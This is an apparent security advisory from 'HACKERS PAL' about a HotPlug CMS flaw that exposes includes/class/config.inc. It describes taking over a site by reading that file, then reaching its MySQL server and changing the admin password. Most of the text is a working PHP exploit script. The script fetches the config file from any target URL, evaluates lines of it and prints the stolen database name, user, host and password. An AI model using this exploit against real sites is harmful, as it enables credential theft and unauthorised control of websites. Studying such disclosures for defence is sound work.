Hello HotPlug CMS Config File Include Vulnerability Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : security (at) soqor (dot) net [email concealed] After Script Url Add includes/class/config.inc And you will download the config file ,, so that you will be able to connect by remote connect program to the mysql server and change admin password and be able to control the website.. And This is the exploit if you want :- #!/usr/bin/php -q -d short_open_tag=on <? /* /* HotPlug CMS Config File Include Vulnerability exploit /* By : HACKERS PAL /* WwW.SoQoR.NeT */ print_r(' /**********************************************/ /* HotPlug CMS Config File Include Vul */ /* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */ /* site: http://www.soqor.net */'); if ($argc<2) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host */ /* Example: */ /* php '.$argv[0].' http://localhost/hot */ /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); $url=$argv[1]; $exploit="/includes/class/config.inc"; $page=$url.$exploit; Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } $page = get_page($page); if(eregi("<?php",$page)) { $lines = explode("\n",$page); $evaled = $lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines [56].$lines[58].$lines[58].$lines[59]; $evaled=str_replace("include","#include",$evaled); eval($evaled); Echo "\n[+] Database Name : $db_name"; Echo "\n[+] Database User : $db_user"; Echo "\n[+] Database Host : $db_host"; Echo "\n[+] Database Pass : $db_password"; Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } else { Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } ?> WwW.SoQoR.NeT